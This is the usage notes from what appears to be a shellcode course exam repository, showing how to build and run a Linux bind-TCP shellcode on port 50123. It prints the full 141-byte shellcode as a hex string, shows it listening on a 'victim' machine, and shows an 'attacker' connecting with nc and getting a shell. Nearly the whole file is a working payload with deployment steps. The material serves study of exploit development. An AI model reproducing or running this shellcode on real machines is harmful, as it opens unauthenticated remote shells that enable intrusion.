SLAE/exam1/USAGE

35 lines
1.5 KiB
Plaintext
Raw Permalink Normal View History

2013-03-12 23:06:45 +00:00
USAGE
1. Compile the shellcode
$ ./compile_all.sh shell_bind_tcp 50123
[I] Using custom port: 50123
[+] Assembling shell_bind_tcp.nasm with NASM ...
[+] Linking shell_bind_tcp.o ...
[+] Generating shellcode with objdump ...
[+] Checking shellcode for NULLs ...
[+] Shellcode size is 141 bytes
"\x31\xc0\xb0\x66\x31\xdb\xb3\x01\x31\xc9\x51\x6a\x06\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xeb\x6d\x5f\x31\xc0\xb0\x66\x31\xdb\xb3\x02\x31\xd2\x52\x66\xff\x37\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x31\xc0\xb0\x66\x31\xdb\xb3\x04\x6a\x01\x56\x89\xe1\xcd\x80\x31\xc0\xb0\x66\x31\xdb\xb3\x05\x31\xd2\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc0\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80\xb0\x3f\xb1\x02\xcd\x80\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80\xe8\x8e\xff\xff\xff\xc3\xcb"
[+] Generating shellcode.c file with the shell_bind_tcp shellcode ...
[+] Compiling shellcode.c with GCC ...
[+] All done! You can run the shellcode now:
$ ./shellcode
1. Run the shellcode on the victim machine
victim $ ./shellcode
Shellcode Length: 141
victim # netstat --inet -apn |grep shellcode
tcp 0 0 0.0.0.0:50123 0.0.0.0:* LISTEN 982/./shellcode
2. Attacker can now connect and get the shell
attacker $ nc localhost 50123
id
uid=500(arno) gid=500(arno) groups=500(arno),18(dialout),498(desktop_admin_r),501(vboxusers) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023